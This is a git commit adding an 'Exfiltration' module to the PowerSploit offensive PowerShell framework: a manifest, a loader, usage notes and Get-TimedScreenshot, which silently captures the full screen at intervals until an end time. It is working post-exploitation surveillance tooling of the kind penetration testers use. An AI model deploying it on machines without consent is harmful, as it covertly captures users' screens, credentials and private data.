Added 'Exfiltration' Module

4 files changed, 199 insertions, 0 deletions

diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1
new file mode 100644
index 0000000..7eb9aa2
--- /dev/null
+++ b/Exfiltration/Exfiltration.psd1
@@ -0,0 +1,87 @@
+@{

+

+# Script module or binary module file associated with this manifest.

+ModuleToProcess = 'Exfiltration.psm1'

+

+# Version number of this module.

+ModuleVersion = '1.0.0.0'

+

+# ID used to uniquely identify this module

+GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'

+

+# Author of this module

+Author = 'Matthew Graeber'

+

+# Company or vendor of this module

+CompanyName = ''

+

+# Copyright statement for this module

+Copyright = 'BSD 3-Clause'

+

+# Description of the functionality provided by this module

+Description = 'PowerSploit Exfiltration Module'

+

+# Minimum version of the Windows PowerShell engine required by this module

+PowerShellVersion = '2.0'

+

+# Name of the Windows PowerShell host required by this module

+# PowerShellHostName = ''

+

+# Minimum version of the Windows PowerShell host required by this module

+# PowerShellHostVersion = ''

+

+# Minimum version of the .NET Framework required by this module

+# DotNetFrameworkVersion = ''

+

+# Minimum version of the common language runtime (CLR) required by this module

+# CLRVersion = ''

+

+# Processor architecture (None, X86, Amd64) required by this module

+# ProcessorArchitecture = ''

+

+# Modules that must be imported into the global environment prior to importing this module

+# RequiredModules = @()

+

+# Assemblies that must be loaded prior to importing this module

+# RequiredAssemblies = @()

+

+# Script files (.ps1) that are run in the caller's environment prior to importing this module.

+# ScriptsToProcess = ''

+

+# Type files (.ps1xml) to be loaded when importing this module

+# TypesToProcess = @()

+

+# Format files (.ps1xml) to be loaded when importing this module

+# FormatsToProcess = @()

+

+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess

+# NestedModules = @()

+

+# Functions to export from this module

+FunctionsToExport = '*'

+

+# Cmdlets to export from this module

+CmdletsToExport = '*'

+

+# Variables to export from this module

+VariablesToExport = ''

+

+# Aliases to export from this module

+AliasesToExport = ''

+

+# List of all modules packaged with this module.

+ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})

+

+# List of all files packaged with this module

+FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'

+

+# Private data to pass to the module specified in RootModule/ModuleToProcess

+# PrivateData = ''

+

+# HelpInfo URI of this module

+# HelpInfoURI = ''

+

+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.

+# DefaultCommandPrefix = ''

+

+}
\ No newline at end of file
diff --git a/Exfiltration/Exfiltration.psm1 b/Exfiltration/Exfiltration.psm1
new file mode 100644
index 0000000..e5234fb
--- /dev/null
+++ b/Exfiltration/Exfiltration.psm1
@@ -0,0 +1 @@
+Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file
diff --git a/Exfiltration/Get-TimedScreenshot.ps1 b/Exfiltration/Get-TimedScreenshot.ps1
new file mode 100644
index 0000000..3a19a7d
--- /dev/null
+++ b/Exfiltration/Get-TimedScreenshot.ps1
@@ -0,0 +1,99 @@
+Function Get-TimedScreenshot {

+<#

+.SYNOPSIS

+ 

+    Get-TimedScreenshot

+    

+    Author: Chris Campbell (@obscuresec)

+    License: BSD 3-Clause

+    

+.DESCRIPTION

+

+    A function that takes screenshots and saves them to a folder.

+

+.PARAMETER $Path

+

+    Specifies the folder path.

+    

+.PARAMETER $Interval

+    

+    Specifies the interval in seconds between taking screenshots.

+

+.PARAMETER $EndTime

+

+    Specifies when the script should stop running in the format HH-MM 

+

+.EXAMPLE 

+

+    PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00 

+ 

+.LINK

+

+    http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html

+    https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot

+

+#>

+

+    [CmdletBinding()] Param(

+            [Parameter(Mandatory=$True)]             

+            [ValidateScript({Test-Path -Path $_ })]

+            [string] $Path, 

+

+            [Parameter(Mandatory=$True)]             

+            [int32] $Interval,

+

+            [Parameter(Mandatory=$True)]             

+            [string] $EndTime    

+            )

+    

+        #Define helper function that generates and saves screenshot

+        Function GenScreenshot {

+           $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen

+           $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height

+           $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)

+           $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)

+           $DrawingGraphics.Dispose()

+           $ScreenshotObject.Save($FilePath)

+           $ScreenshotObject.Dispose()

+        }

+

+        Try {

+            

+            #load required assembly

+            Add-Type -Assembly System.Windows.Forms            

+

+            Do {

+                #get the current time and build the filename from it

+                $Time = (Get-Date)

+                

+                [string] $FileName = "$($Time.Month)"

+                $FileName += '-'

+                $FileName += "$($Time.Day)" 

+                $FileName += '-'

+                $FileName += "$($Time.Year)"

+                $FileName += '-'

+                $FileName += "$($Time.Hour)"

+                $FileName += '-'

+                $FileName += "$($Time.Minute)"

+                $FileName += '-'

+                $FileName += "$($Time.Second)"

+                $FileName += '.png'

+            

+                #use join-path to add path to filename

+                [string] $FilePath = (Join-Path $Path $FileName)

+

+                #run screenshot function

+                GenScreenshot

+                

+                Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"

+

+                Start-Sleep -Seconds $Interval

+            }

+

+            #note that this will run once regardless if the specified time as passed

+            While ((Get-Date -Format HH:%m) -lt $EndTime)

+        }

+

+       Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"}

+

+}
\ No newline at end of file
diff --git a/Exfiltration/Usage.md b/Exfiltration/Usage.md
new file mode 100644
index 0000000..dfdaabb
--- /dev/null
+++ b/Exfiltration/Usage.md
@@ -0,0 +1,12 @@
+To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.

+

+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"

+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"

+

+To use the module, type `Import-Module Exfiltration`

+

+To see the commands imported, type `Get-Command -Module Exfiltration`

+

+For help on each individual command, Get-Help is your friend.

+

+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
\ No newline at end of file